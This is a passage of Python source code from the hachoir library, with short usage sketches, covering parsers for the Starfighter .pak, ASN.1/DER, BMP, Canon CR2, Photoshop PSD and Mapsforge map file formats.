"file_ext": ("pak",),
"mime": (u"application/octet-stream",),
"min_size": 4 * 8, # just the identifier
"magic": ((b'PACK', 0),),
"description": "Parallel Realities Starfighter .pak archive",
}
endian = LITTLE_ENDIAN
def validate(self):
return (self.stream.readBytes(0, 4) == b'PACK'
and self["file[0]/size"].value >= 0
and len(self["file[0]/filename"].value) > 0)
def createFields(self):
yield String(self, "magic", 4)
# all remaining data must be file entries:
while self.current_size < self._size:
yield FileEntry(self, "file[]")
```
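The format is simple enough to synthesize by hand, which also shows what `validate()` checks: the PACK magic, a sane first entry size, and a non-empty first filename. A sketch, again assuming `StringInputStream` accepts raw bytes:
```python
# Sketch: building a minimal .pak archive and parsing it back from memory.
import struct
from hachoir.stream import StringInputStream

payload = b"hello"
entry = (b"music/title.ogg".ljust(56, b"\0")   # 56-byte NUL-padded filename
         + struct.pack("<I", len(payload))     # little-endian 32-bit size
         + payload)
pak = b"PACK" + entry

parser = PRSPakFile(StringInputStream(pak))
print(parser["file[0]/filename"].value)   # "music/title.ogg"
print(parser["file[0]/size"].value)       # 5
```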
#### File: parser/container/asn1.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
FieldError, ParserError,
Bit, Bits, Bytes, UInt8, GenericInteger, String,
Field, Enum, RawBytes)
from hachoir.core.endian import BIG_ENDIAN
from hachoir.core.tools import createDict, humanDatetime
from hachoir.stream import InputStreamError
from hachoir.core.text_handler import textHandler
# --- Field parser ---
class ASNInteger(Field):
"""
Integer: two cases:
- first byte in 0..127: it's the value
- first byte in 128..255: byte & 127 is the number of bytes,
next bytes are the value
"""
def __init__(self, parent, name, description=None):
Field.__init__(self, parent, name, 8, description)
stream = self._parent.stream
addr = self.absolute_address
value = stream.readBits(addr, 8, BIG_ENDIAN)
if 128 <= value:
nbits = (value & 127) * 8
if not nbits:
raise ParserError("ASN.1: invalid ASN integer size (zero)")
if 64 < nbits:
# Arbitrary limit to catch errors
raise ParserError("ASN.1: ASN integer is limited to 64 bits")
self._size = 8 + nbits
value = stream.readBits(addr + 8, nbits, BIG_ENDIAN)
self.createValue = lambda: value
class OID_Integer(Bits):
def __init__(self, parent, name, description=None):
Bits.__init__(self, parent, name, 8, description)
stream = self._parent.stream
addr = self.absolute_address
size = 8
value = 0
byte = stream.readBits(addr, 8, BIG_ENDIAN)
value = byte & 127
while 128 <= byte:
addr += 8
size += 8
if 64 < size:
# Arbitrary limit to catch errors
raise ParserError(
"ASN.1: Object identifier is limited 64 bits")
byte = stream.readBits(addr, 8, BIG_ENDIAN)
value = (value << 7) + (byte & 127)
self._size = size
self.createValue = lambda: value
def readSequence(self, content_size):
while self.current_size < self.size:
yield Object(self, "item[]")
def readSet(self, content_size):
yield Object(self, "value", size=content_size * 8)
def readASCIIString(self, content_size):
yield String(self, "value", content_size, charset="ASCII")
def readUTF8String(self, content_size):
yield String(self, "value", content_size, charset="UTF-8")
def readBMPString(self, content_size):
yield String(self, "value", content_size, charset="UTF-16")
def readBitString(self, content_size):
yield UInt8(self, "padding_size", description="Number of unused bits")
if content_size > 1:
yield Bytes(self, "value", content_size - 1)
def readOctetString(self, content_size):
yield Bytes(self, "value", content_size)
def formatObjectID(fieldset):
text = [fieldset["first"].display]
items = [field for field in fieldset if field.name.startswith("item[")]
text.extend(str(field.value) for field in items)
return ".".join(text)
def readObjectID(self, content_size):
yield textHandler(UInt8(self, "first"), formatFirstObjectID)
while self.current_size < self.size:
yield OID_Integer(self, "item[]")
def readBoolean(self, content_size):
if content_size != 1:
raise ParserError(
"Overlong boolean: got %s bytes, expected 1 byte" % content_size)
yield textHandler(UInt8(self, "value"), lambda field: str(bool(field.value)))
def readInteger(self, content_size):
# Always signed?
yield GenericInteger(self, "value", True, content_size * 8)
# --- Format ---
def formatFirstObjectID(field):
value = field.value
return "%u.%u" % (value // 40, value % 40)
def formatValue(fieldset):
return fieldset["value"].display
def formatUTCTime(fieldset):
import datetime
value = fieldset["value"].value
year = int(value[0:2])
if year < 50:
year += 2000
else:
year += 1900
month = int(value[2:4])
day = int(value[4:6])
hour = int(value[6:8])
minute = int(value[8:10])
if value[-1] == "Z":
second = int(value[10:12])
dt = datetime.datetime(year, month, day, hour, minute, second)
else:
# Skip timezone...
dt = datetime.datetime(year, month, day, hour, minute)
return humanDatetime(dt)
# --- Object parser ---
class Object(FieldSet):
TYPE_INFO = {
# TODO: Write parser
0: ("end[]", None, "End (reserved for BER, None)", None),
1: ("boolean[]", readBoolean, "Boolean", None),
2: ("integer[]", readInteger, "Integer", None),
3: ("bit_str[]", readBitString, "Bit string", None),
4: ("octet_str[]", readOctetString, "Octet string", None),
5: ("null[]", None, "NULL (empty, None)", None),
6: ("obj_id[]", readObjectID, "Object identifier", formatObjectID),
7: ("obj_desc[]", None, "Object descriptor", None), # TODO: Write parser
# TODO: Write parser # External?
8: ("external[]", None, "External, instance of", None),
9: ("real[]", readASCIIString, "Real number", None), # TODO: Write parser
10: ("enum[]", readInteger, "Enumerated", None),
11: ("embedded[]", None, "Embedded PDV", None), # TODO: Write parser
12: ("utf8_str[]", readUTF8String, "Printable string", None),
# TODO: Write parser
13: ("rel_obj_id[]", None, "Relative object identifier", None),
14: ("time[]", None, "Time", None), # TODO: Write parser
# 15: invalid??? sequence of???
16: ("seq[]", readSequence, "Sequence", None),
17: ("set[]", readSet, "Set", None),
18: ("num_str[]", readASCIIString, "Numeric string", None),
19: ("print_str[]", readASCIIString, "Printable string", formatValue),
20: ("teletex_str[]", readASCIIString, "Teletex (T61, None) string", None),
21: ("videotex_str[]", readASCIIString, "Videotex string", None),
22: ("ia5_str[]", readASCIIString, "IA5 string", formatValue),
23: ("utc_time[]", readASCIIString, "UTC time", formatUTCTime),
24: ("general_time[]", readASCIIString, "Generalized time", None),
25: ("graphic_str[]", readASCIIString, "Graphic string", None),
26: ("visible_str[]", readASCIIString, "Visible (ISO64, None) string", None),
27: ("general_str[]", readASCIIString, "General string", None),
28: ("universal_str[]", readASCIIString, "Universal string", None),
29: ("unrestricted_str[]", readASCIIString, "Unrestricted string", None),
30: ("bmp_str[]", readBMPString, "BMP string", None),
# 31: multiple octet tag number, TODO: not supported
# Extended tag values:
# 31: Date
# 32: Time of day
# 33: Date-time
# 34: Duration
}
TYPE_DESC = createDict(TYPE_INFO, 2)
CLASS_DESC = {0: "universal", 1: "application", 2: "context", 3: "private"}
FORM_DESC = {False: "primitive", True: "constructed"}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
key = self["type"].value & 31
if self['class'].value == 0:
# universal object
if key in self.TYPE_INFO:
self._name, self._handler, self._description, create_desc = self.TYPE_INFO[
key]
if create_desc:
self.createDescription = lambda: "%s: %s" % (
self.TYPE_INFO[key][2], create_desc(self))
self._description = None
elif key == 31:
raise ParserError(
"ASN.1 Object: tag bigger than 30 are not supported")
else:
self._handler = None
elif self['form'].value:
# constructed: treat as sequence
self._name = 'seq[]'
self._handler = readSequence
self._description = 'constructed object type %i' % key
else:
# primitive, context/private
self._name = 'raw[]'
self._handler = readASCIIString
self._description = '%s object type %i' % (
self['class'].display, key)
field = self["size"]
self._size = field.address + field.size + field.value * 8
def createFields(self):
yield Enum(Bits(self, "class", 2), self.CLASS_DESC)
yield Enum(Bit(self, "form"), self.FORM_DESC)
if self['class'].value == 0:
yield Enum(Bits(self, "type", 5), self.TYPE_DESC)
else:
yield Bits(self, "type", 5)
yield ASNInteger(self, "size", "Size in bytes")
size = self["size"].value
if size:
if self._handler:
yield from self._handler(self, size)
else:
yield RawBytes(self, "raw", size)
class ASN1File(Parser):
PARSER_TAGS = {
"id": "asn1",
"category": "container",
"file_ext": ("der",),
"min_size": 16,
"description": "Abstract Syntax Notation One (ASN.1)"
}
endian = BIG_ENDIAN
def validate(self):
try:
root = self[0]
except (InputStreamError, FieldError):
return "Unable to create root object"
if root.size != self.size:
return "Invalid root object size"
return True
def createFields(self):
yield Object(self, "root")
```
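The length handling in `ASNInteger` is the standard DER short/long form: a first byte below 128 is the length itself, otherwise its low 7 bits give the number of length bytes that follow. A worked example decoding SEQUENCE { INTEGER 5, INTEGER 9 }, whose items end up named `integer[0]` and `integer[1]` by the TYPE_INFO renaming in `Object.__init__`:
```python
# Worked example: DER bytes for SEQUENCE { INTEGER 5, INTEGER 9 }.
# 0x30 = universal class, constructed form, tag 16 (sequence)
# 0x06 = short-form length: the sequence body is 6 bytes
from hachoir.stream import StringInputStream

der = bytes([0x30, 0x06, 0x02, 0x01, 0x05, 0x02, 0x01, 0x09])
root = ASN1File(StringInputStream(der))
seq = root[0]                        # the outer SEQUENCE object
for integer in seq.array("integer"):
    print(integer["value"].value)    # 5, then 9
```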
#### File: parser/image/bmp.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt8, UInt16, UInt32, Bits,
String, RawBytes, Enum,
PaddingBytes, NullBytes, createPaddingField)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.text_handler import textHandler, hexadecimal
from hachoir.parser.image.common import RGB, PaletteRGBA
from hachoir.core.tools import alignValue
class Pixel4bit(Bits):
static_size = 4
def __init__(self, parent, name):
Bits.__init__(self, parent, name, 4)
class ImageLine(FieldSet):
def __init__(self, parent, name, width, pixel_class):
FieldSet.__init__(self, parent, name)
self._pixel = pixel_class
self._width = width
self._size = alignValue(self._width * self._pixel.static_size, 32)
def createFields(self):
for x in range(self._width):
yield self._pixel(self, "pixel[]")
size = self.size - self.current_size
if size:
yield createPaddingField(self, size)
class ImagePixels(FieldSet):
def __init__(self, parent, name, width, height, pixel_class, size=None):
FieldSet.__init__(self, parent, name, size=size)
self._width = width
self._height = height
self._pixel = pixel_class
def createFields(self):
for y in range(self._height - 1, -1, -1):
yield ImageLine(self, "line[%u]" % y, self._width, self._pixel)
size = (self.size - self.current_size) // 8
if size:
yield NullBytes(self, "padding", size)
class CIEXYZ(FieldSet):
def createFields(self):
yield UInt32(self, "x")
yield UInt32(self, "y")
yield UInt32(self, "z")
class BmpHeader(FieldSet):
color_space_name = {
1: "Business (Saturation)",
2: "Graphics (Relative)",
4: "Images (Perceptual)",
8: "Absolute colormetric (Absolute)",
}
def getFormatVersion(self):
if "gamma_blue" in self:
return 4
if "important_color" in self:
return 3
return 2
def createFields(self):
# Version 2 (12 bytes)
yield UInt32(self, "header_size", "Header size")
yield UInt32(self, "width", "Width (pixels)")
yield UInt32(self, "height", "Height (pixels)")
yield UInt16(self, "nb_plan", "Number of plan (=1)")
# may be zero for PNG/JPEG picture
yield UInt16(self, "bpp", "Bits per pixel")
# Version 3 (40 bytes)
if self["header_size"].value < 40:
return
yield Enum(UInt32(self, "compression", "Compression method"), BmpFile.COMPRESSION_NAME)
yield UInt32(self, "image_size", "Image size (bytes)")
yield UInt32(self, "horizontal_dpi", "Horizontal DPI")
yield UInt32(self, "vertical_dpi", "Vertical DPI")
yield UInt32(self, "used_colors", "Number of color used")
yield UInt32(self, "important_color", "Number of import colors")
# Version 4 (108 bytes)
if self["header_size"].value < 108:
return
yield textHandler(UInt32(self, "red_mask"), hexadecimal)
yield textHandler(UInt32(self, "green_mask"), hexadecimal)
yield textHandler(UInt32(self, "blue_mask"), hexadecimal)
yield textHandler(UInt32(self, "alpha_mask"), hexadecimal)
yield Enum(UInt32(self, "color_space"), self.color_space_name)
yield CIEXYZ(self, "red_primary")
yield CIEXYZ(self, "green_primary")
yield CIEXYZ(self, "blue_primary")
yield UInt32(self, "gamma_red")
yield UInt32(self, "gamma_green")
yield UInt32(self, "gamma_blue")
def parseImageData(parent, name, size, header):
if ("compression" not in header) or (header["compression"].value in (0, 3)):
width = header["width"].value
height = header["height"].value
bpp = header["bpp"].value
if bpp == 32:
cls = UInt32
elif bpp == 24:
cls = RGB
elif bpp == 8:
cls = UInt8
elif bpp == 4:
cls = Pixel4bit
else:
cls = None
if cls:
return ImagePixels(parent, name, width, height, cls, size=size * 8)
return RawBytes(parent, name, size)
class BmpFile(Parser):
PARSER_TAGS = {
"id": "bmp",
"category": "image",
"file_ext": ("bmp",),
"mime": ("image/x-ms-bmp", "image/x-bmp"),
"min_size": 30 * 8,
# "magic": (("BM", 0),),
"magic_regex": ((
# "BM", <filesize>, <reserved>, header_size=(12|40|108)
b"BM.{4}.{8}[\x0C\x28\x6C]\0{3}",
0),),
"description": "Microsoft bitmap (BMP) picture"
}
endian = LITTLE_ENDIAN
COMPRESSION_NAME = {
0: "Uncompressed",
1: "RLE 8-bit",
2: "RLE 4-bit",
3: "Bitfields",
4: "JPEG",
5: "PNG",
}
def validate(self):
if self.stream.readBytes(0, 2) != b'BM':
return "Wrong file signature"
if self["header/header_size"].value not in (12, 40, 108):
return "Unknown header size (%s)" % self["header_size"].value
if self["header/nb_plan"].value != 1:
return "Invalid number of planes"
return True
def createFields(self):
yield String(self, "signature", 2, "Header (\"BM\")", charset="ASCII")
yield UInt32(self, "file_size", "File size (bytes)")
yield PaddingBytes(self, "reserved", 4, "Reserved")
yield UInt32(self, "data_start", "Data start position")
yield BmpHeader(self, "header")
# Compute number of color
header = self["header"]
bpp = header["bpp"].value
if 0 < bpp <= 8:
if "used_colors" in header and header["used_colors"].value:
nb_color = header["used_colors"].value
else:
nb_color = (1 << bpp)
else:
nb_color = 0
# Color palette (if any)
if nb_color:
yield PaletteRGBA(self, "palette", nb_color)
# Seek to data start
field = self.seekByte(self["data_start"].value)
if field:
yield field
# Image pixels
size = min(self["file_size"].value - self["data_start"].value,
(self.size - self.current_size) // 8)
yield parseImageData(self, "pixels", size, header)
def createDescription(self):
return "Microsoft Bitmap version %s" % self["header"].getFormatVersion()
def createContentSize(self):
return self["file_size"].value * 8
```
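The `validate()` rules above (a BM signature, a header size of 12, 40 or 108, one plane) are easy to satisfy with a hand-built file; a sketch constructing a 1x1 24-bit bitmap with the 40-byte version-3 header and reading it back:
```python
# Sketch: a hand-built 1x1 24-bit BMP (40-byte v3 header) fed to BmpFile.
import struct
from hachoir.stream import StringInputStream

pixels = b"\x00\x00\xff\x00"          # one BGR pixel, padded to 32 bits
info = struct.pack("<IIIHHIIIIII",
                   40, 1, 1,          # header_size, width, height
                   1, 24,             # nb_plan, bpp
                   0, len(pixels),    # compression, image_size
                   2835, 2835,        # ~72 DPI, stored as pixels per metre
                   0, 0)              # used_colors, important_color
bmp = (b"BM" + struct.pack("<I", 14 + len(info) + len(pixels))
       + b"\x00" * 4 + struct.pack("<I", 14 + len(info)) + info + pixels)

parser = BmpFile(StringInputStream(bmp))
print(parser["header/width"].value, "x", parser["header/height"].value)  # 1 x 1
print(parser["header/compression"].display)                              # "Uncompressed"
```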
#### File: parser/image/cr2.py
```python
from hachoir.parser import Parser
from hachoir.field import SeekableFieldSet, RootSeekableFieldSet, Bytes, String, UInt8, UInt16, UInt32
from hachoir.core.endian import LITTLE_ENDIAN, BIG_ENDIAN
from hachoir.core.text_handler import textHandler, hexadecimal
from hachoir.parser.image.exif import IFD, IFD_TAGS
def getStrips(ifd):
data = {}
for i, entry in enumerate(ifd.array('entry')):
data[entry['tag'].display] = entry
# image data
if "StripOffsets" in data and "StripByteCounts" in data:
offs = ifd.getEntryValues(data["StripOffsets"])
bytes = ifd.getEntryValues(data["StripByteCounts"])
for off, byte in zip(offs, bytes):
yield off.value, byte.value
class ImageFile(SeekableFieldSet):
def __init__(self, parent, name, description, ifd):
SeekableFieldSet.__init__(self, parent, name, description, None)
self._ifd = ifd
def createFields(self):
for off, byte in getStrips(self._ifd):
self.seekByte(off, relative=False)
yield Bytes(self, "strip[]", byte)
class CR2File(RootSeekableFieldSet, Parser):
PARSER_TAGS = {
"id": "cr2",
"category": "image",
"file_ext": ("cr2",),
"mime": ("image/x-canon-cr2",),
"min_size": 15,
"magic": ((b"CR", 8),),
"description": "Canon CR2 raw image data, version 2.0"
}
# Correct endian is set in constructor
endian = LITTLE_ENDIAN
def __init__(self, stream, **args):
RootSeekableFieldSet.__init__(
self, None, "root", stream, None, stream.askSize(self))
if self.stream.readBytes(0, 2) == b"MM":
self.endian = BIG_ENDIAN
Parser.__init__(self, stream, **args)
def validate(self):
endian = self.stream.readBytes(0, 2)
if endian not in (b"MM", b"II"):
return "Invalid endian (%r)" % endian
if self["version"].value != 42:
return "Unknown Canon TIFF version - " + str(self["version"].value)
if self["cr_identifier"].value != "CR":
return "Unknown Canon Raw File"
return True
def createFields(self):
iff_start = self.absolute_address
yield String(self, "endian", 2, "Endian ('II' or 'MM')", charset="ASCII")
if self["endian"].value == "II":
self.endian = LITTLE_ENDIAN
else:
self.endian = BIG_ENDIAN
yield UInt16(self, "version", "TIFF version number")
yield UInt32(self, "img_dir_ofs", "Next image directory offset")
yield String(self, "cr_identifier", 2, "Canon Raw marker", charset="ASCII")
yield UInt8(self, "cr_major_version", "Canon Raw major version number")
yield UInt8(self, "cr_minor_version", "Canon Raw minor version number")
yield textHandler(UInt32(self, "cr_raw_ifd_offset", "Offset to Raw IFD"), hexadecimal)
offsets = [(self['img_dir_ofs'].value, 'ifd[]', IFD)]
while offsets:
offset, name, klass = offsets.pop(0)
self.seekByte(offset + iff_start // 8, relative=False)
ifd = klass(self, name, iff_start)
yield ifd
for entry in ifd.array('entry'):
tag = entry['tag'].value
if tag in IFD_TAGS:
name, klass = IFD_TAGS[tag]
offsets.append((ifd.getEntryValues(entry)[
0].value, name + '[]', klass))
if ifd['next'].value != 0:
offsets.append((ifd['next'].value, 'ifd[]', IFD))
for ifd in self.array('ifd'):
offs = (off for off, byte in getStrips(ifd))
self.seekByte(min(offs), relative=False)
image = ImageFile(self, "image[]", "Image File", ifd)
yield image
```
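A sketch dumping the raw strip layout that `getStrips` recovers from each IFD (the path is a placeholder):
```python
# Sketch: listing the strip offsets/sizes that CR2File's IFDs point at.
from hachoir.parser import createParser

raw = createParser("IMG_0001.CR2")   # placeholder path
if raw:
    for i, ifd in enumerate(raw.array("ifd")):
        for offset, nbytes in getStrips(ifd):
            print("ifd[%d]: strip at byte %d, %d bytes" % (i, offset, nbytes))
```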
#### File: parser/image/psd.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt16, UInt32, String, NullBytes, Enum, RawBytes)
from hachoir.core.endian import BIG_ENDIAN
from hachoir.parser.image.photoshop_metadata import Photoshop8BIM
class Config(FieldSet):
def __init__(self, *args):
FieldSet.__init__(self, *args)
self._size = (4 + self["size"].value) * 8
def createFields(self):
yield UInt32(self, "size")
while not self.eof:
yield Photoshop8BIM(self, "item[]")
class PsdFile(Parser):
endian = BIG_ENDIAN
PARSER_TAGS = {
"id": "psd",
"category": "image",
"file_ext": ("psd",),
"mime": ("image/psd", "image/photoshop", "image/x-photoshop"),
"min_size": 4 * 8,
"magic": ((b"8BPS\0\1", 0),),
"description": "Photoshop (PSD) picture",
}
COLOR_MODE = {
0: "Bitmap",
1: "Grayscale",
2: "Indexed",
3: "RGB color",
4: "CMYK color",
7: "Multichannel",
8: "Duotone",
9: "Lab Color",
}
COMPRESSION_NAME = {
0: "Raw data",
1: "RLE",
}
def validate(self):
if self.stream.readBytes(0, 4) != b"8BPS":
return "Invalid signature"
return True
def createFields(self):
yield String(self, "signature", 4, "PSD signature (8BPS)", charset="ASCII")
yield UInt16(self, "version")
yield NullBytes(self, "reserved[]", 6)
yield UInt16(self, "nb_channels")
yield UInt32(self, "width")
yield UInt32(self, "height")
yield UInt16(self, "depth")
yield Enum(UInt16(self, "color_mode"), self.COLOR_MODE)
# Mode data
yield UInt32(self, "mode_data_size")
size = self["mode_data_size"].value
if size:
yield RawBytes(self, "mode_data", size)
# Resources
yield Config(self, "config")
# Reserved
yield UInt32(self, "reserved_data_size")
size = self["reserved_data_size"].value
if size:
yield RawBytes(self, "reserved_data", size)
yield Enum(UInt16(self, "compression"), self.COMPRESSION_NAME)
size = (self.size - self.current_size) // 8
if size:
yield RawBytes(self, "end", size)
```
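A sketch reading back the header fields parsed above (the path is a placeholder):
```python
# Sketch: reading PSD header fields with PsdFile.
from hachoir.parser import createParser

psd = createParser("sample.psd")   # placeholder path
if psd:
    print(psd["width"].value, "x", psd["height"].value)
    print("channels:", psd["nb_channels"].value, "depth:", psd["depth"].value)
    print("mode:", psd["color_mode"].display)
```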
#### File: parser/misc/mapsforge_map.py
```python
from hachoir.parser import Parser
from hachoir.field import (Bit, Bits, UInt8, UInt16, UInt32, Int32, UInt64, String,
PaddingBits,
Enum, Field, FieldSet, SeekableFieldSet, RootSeekableFieldSet)
from hachoir.core.endian import BIG_ENDIAN
# micro-degrees factor:
UDEG = float(1000 * 1000)
CoordinateEncoding = {
0: "single delta encoding",
1: "double delta encoding",
}
class UIntVbe(Field):
def __init__(self, parent, name, description=None):
Field.__init__(self, parent, name, description=description)
value = 0
size = 0
while True:
byteValue = self._parent.stream.readBytes(
self.absolute_address + (size * 8), 1)[0]
haveMoreData = (byteValue & 0x80)
value = value | ((byteValue & 0x7f) << (size * 7))
size += 1
assert size < 100, "UIntVBE is too large"
            if not haveMoreData:
break
self._size = size * 8
self.createValue = lambda: value
class IntVbe(Field):
def __init__(self, parent, name, description=None):
Field.__init__(self, parent, name, description=description)
value = 0
size = 0
shift = 0
while True:
byteValue = self._parent.stream.readBytes(
self.absolute_address + (size * 8), 1)[0]
haveMoreData = (byteValue & 0x80)
if size == 0:
isNegative = (byteValue & 0x40)
value = (byteValue & 0x3f)
shift += 6
else:
value = value | ((byteValue & 0x7f) << shift)
shift += 7
size += 1
assert size < 100, "IntVBE is too large"
            if not haveMoreData:
break
if isNegative:
value *= -1
self._size = size * 8
self.createValue = lambda: value
class VbeString(FieldSet):
def createFields(self):
yield UIntVbe(self, "length")
yield String(self, "chars", self["length"].value, charset="UTF-8")
def createDescription(self):
return '(%d B) "%s"' % (self["length"].value, self["chars"].value)
class TagStringList(FieldSet):
def createFields(self):
yield UInt16(self, "num_tags")
for i in range(self["num_tags"].value):
yield VbeString(self, "tag[]")
def createDescription(self):
return "%d tag strings" % self["num_tags"].value
class ZoomIntervalCfg(FieldSet):
def createFields(self):
yield UInt8(self, "base_zoom_level")
yield UInt8(self, "min_zoom_level")
yield UInt8(self, "max_zoom_level")
yield UInt64(self, "subfile_start")
yield UInt64(self, "subfile_size")
def createDescription(self):
return "zoom level around %d (%d - %d)" % (self["base_zoom_level"].value,
self["min_zoom_level"].value, self["max_zoom_level"].value)
class TileIndexEntry(FieldSet):
def createFields(self):
yield Bit(self, "is_water_tile")
yield Bits(self, "offset", 39)
class TileZoomTable(FieldSet):
def createFields(self):
yield UIntVbe(self, "num_pois")
yield UIntVbe(self, "num_ways")
def createDescription(self):
return "%d POIs, %d ways" % (self["num_pois"].value, self["num_ways"].value)
class TileHeader(FieldSet):
def __init__(self, parent, name, zoomIntervalCfg, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.zoomIntervalCfg = zoomIntervalCfg
def createFields(self):
numLevels = int(self.zoomIntervalCfg[
"max_zoom_level"].value - self.zoomIntervalCfg["min_zoom_level"].value) + 1
assert(numLevels < 50)
for i in range(numLevels):
yield TileZoomTable(self, "zoom_table_entry[]")
yield UIntVbe(self, "first_way_offset")
class POIData(FieldSet):
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 32)
if not self['signature'].value.startswith("***POIStart"):
raise ValueError
yield IntVbe(self, "lat_diff")
yield IntVbe(self, "lon_diff")
yield Bits(self, "layer", 4)
yield Bits(self, "num_tags", 4)
for i in range(self["num_tags"].value):
yield UIntVbe(self, "tag_id[]")
yield Bit(self, "have_name")
yield Bit(self, "have_house_number")
yield Bit(self, "have_ele")
yield PaddingBits(self, "pad[]", 5)
if self["have_name"].value:
yield VbeString(self, "name")
if self["have_house_number"].value:
yield VbeString(self, "house_number")
if self["have_ele"].value:
yield IntVbe(self, "ele")
def createDescription(self):
s = "POI"
if self["have_name"].value:
s += ' "%s"' % self["name"]["chars"].value
s += " @ %f/%f" % (self["lat_diff"].value / UDEG,
self["lon_diff"].value / UDEG)
return s
class SubTileBitmap(FieldSet):
static_size = 2 * 8
def createFields(self):
for y in range(4):
for x in range(4):
yield Bit(self, "is_used[%d,%d]" % (x, y))
class WayProperties(FieldSet):
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 32)
if not self['signature'].value.startswith("---WayStart"):
raise ValueError
yield UIntVbe(self, "way_data_size")
# WayProperties is split into an outer and an inner field, to allow
# specifying data size for inner part:
yield WayPropertiesInner(self, "inner", size=self["way_data_size"].value * 8)
class WayPropertiesInner(FieldSet):
def createFields(self):
yield SubTileBitmap(self, "sub_tile_bitmap")
# yield Bits(self, "sub_tile_bitmap", 16)
yield Bits(self, "layer", 4)
yield Bits(self, "num_tags", 4)
for i in range(self["num_tags"].value):
yield UIntVbe(self, "tag_id[]")
yield Bit(self, "have_name")
yield Bit(self, "have_house_number")
yield Bit(self, "have_ref")
yield Bit(self, "have_label_position")
yield Bit(self, "have_num_way_blocks")
yield Enum(Bit(self, "coord_encoding"), CoordinateEncoding)
yield PaddingBits(self, "pad[]", 2)
if self["have_name"].value:
yield VbeString(self, "name")
if self["have_house_number"].value:
yield VbeString(self, "house_number")
if self["have_ref"].value:
yield VbeString(self, "ref")
if self["have_label_position"].value:
yield IntVbe(self, "label_lat_diff")
yield IntVbe(self, "label_lon_diff")
numWayDataBlocks = 1
if self["have_num_way_blocks"].value:
yield UIntVbe(self, "num_way_blocks")
numWayDataBlocks = self["num_way_blocks"].value
for i in range(numWayDataBlocks):
yield WayData(self, "way_data[]")
def createDescription(self):
s = "way"
if self["have_name"].value:
s += ' "%s"' % self["name"]["chars"].value
return s
class WayData(FieldSet):
def createFields(self):
yield UIntVbe(self, "num_coord_blocks")
for i in range(self["num_coord_blocks"].value):
yield WayCoordBlock(self, "way_coord_block[]")
class WayCoordBlock(FieldSet):
def createFields(self):
yield UIntVbe(self, "num_way_nodes")
yield IntVbe(self, "first_lat_diff")
yield IntVbe(self, "first_lon_diff")
for i in range(self["num_way_nodes"].value - 1):
yield IntVbe(self, "lat_diff[]")
yield IntVbe(self, "lon_diff[]")
class TileData(FieldSet):
def __init__(self, parent, name, zoomIntervalCfg, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.zoomIntervalCfg = zoomIntervalCfg
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 32)
if not self['signature'].value.startswith("###TileStart"):
raise ValueError
yield TileHeader(self, "tile_header", self.zoomIntervalCfg)
numLevels = int(self.zoomIntervalCfg[
"max_zoom_level"].value - self.zoomIntervalCfg["min_zoom_level"].value) + 1
for zoomLevel in range(numLevels):
zoomTableEntry = self["tile_header"][
"zoom_table_entry[%d]" % zoomLevel]
for poiIndex in range(zoomTableEntry["num_pois"].value):
yield POIData(self, "poi_data[%d,%d]" % (zoomLevel, poiIndex))
for zoomLevel in range(numLevels):
zoomTableEntry = self["tile_header"][
"zoom_table_entry[%d]" % zoomLevel]
for wayIndex in range(zoomTableEntry["num_ways"].value):
yield WayProperties(self, "way_props[%d,%d]" % (zoomLevel, wayIndex))
class ZoomSubFile(SeekableFieldSet):
def __init__(self, parent, name, zoomIntervalCfg, **kw):
SeekableFieldSet.__init__(self, parent, name, **kw)
self.zoomIntervalCfg = zoomIntervalCfg
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 16)
if self['signature'].value != "+++IndexStart+++":
raise ValueError
indexEntries = []
numTiles = None
i = 0
while True:
entry = TileIndexEntry(self, "tile_index_entry[]")
indexEntries.append(entry)
yield entry
i += 1
if numTiles is None:
# calculate number of tiles (TODO: better calc this from map
# bounding box)
firstOffset = self["tile_index_entry[0]"]["offset"].value
if self["/have_debug"].value:
firstOffset -= 16
                numTiles = firstOffset // 5
if i >= numTiles:
break
for i, indexEntry in enumerate(indexEntries):
offset = indexEntry["offset"].value
self.seekByte(offset, relative=True)
if i != len(indexEntries) - 1:
next_offset = indexEntries[i + 1]["offset"].value
size = (next_offset - offset) * 8
else:
size = self.size - offset * 8
if size == 0:
# hachoir doesn't support empty field.
continue
yield TileData(self, "tile_data[%d]" % i, zoomIntervalCfg=self.zoomIntervalCfg, size=size)
class MapsforgeMapFile(Parser, RootSeekableFieldSet):
PARSER_TAGS = {
"id": "mapsforge_map",
"category": "misc",
"file_ext": ("map",),
"min_size": 62 * 8,
"description": "Mapsforge map file",
}
endian = BIG_ENDIAN
def validate(self):
return self["file_magic"].value == "mapsforge binary OSM" and self["file_version"].value == 3
def createFields(self):
yield String(self, "file_magic", 20)
yield UInt32(self, "header_size")
yield UInt32(self, "file_version")
yield UInt64(self, "file_size")
yield UInt64(self, "creation_date")
yield Int32(self, "min_lat")
yield Int32(self, "min_lon")
yield Int32(self, "max_lat")
yield Int32(self, "max_lon")
yield UInt16(self, "tile_size")
yield VbeString(self, "projection")
# flags
yield Bit(self, "have_debug")
yield Bit(self, "have_map_start")
yield Bit(self, "have_start_zoom")
yield Bit(self, "have_language_preference")
yield Bit(self, "have_comment")
yield Bit(self, "have_created_by")
yield Bits(self, "reserved[]", 2)
if self["have_map_start"].value:
yield UInt32(self, "start_lat")
yield UInt32(self, "start_lon")
if self["have_start_zoom"].value:
yield UInt8(self, "start_zoom")
if self["have_language_preference"].value:
yield VbeString(self, "language_preference")
if self["have_comment"].value:
yield VbeString(self, "comment")
if self["have_created_by"].value:
yield VbeString(self, "created_by")
yield TagStringList(self, "poi_tags")
yield TagStringList(self, "way_tags")
yield UInt8(self, "num_zoom_intervals")
for i in range(self["num_zoom_intervals"].value):
yield ZoomIntervalCfg(self, "zoom_interval_cfg[]")
for i in range(self["num_zoom_intervals"].value):
zoomIntervalCfg = self["zoom_interval_cfg[%d]" % i]
self.seekByte(zoomIntervalCfg[
"subfile_start"].value, relative=False)
yield ZoomSubFile(self, "subfile[]", size=zoomIntervalCfg["subfile_size"].value * 8, zoomIntervalCfg=zoomIntervalCfg)
```
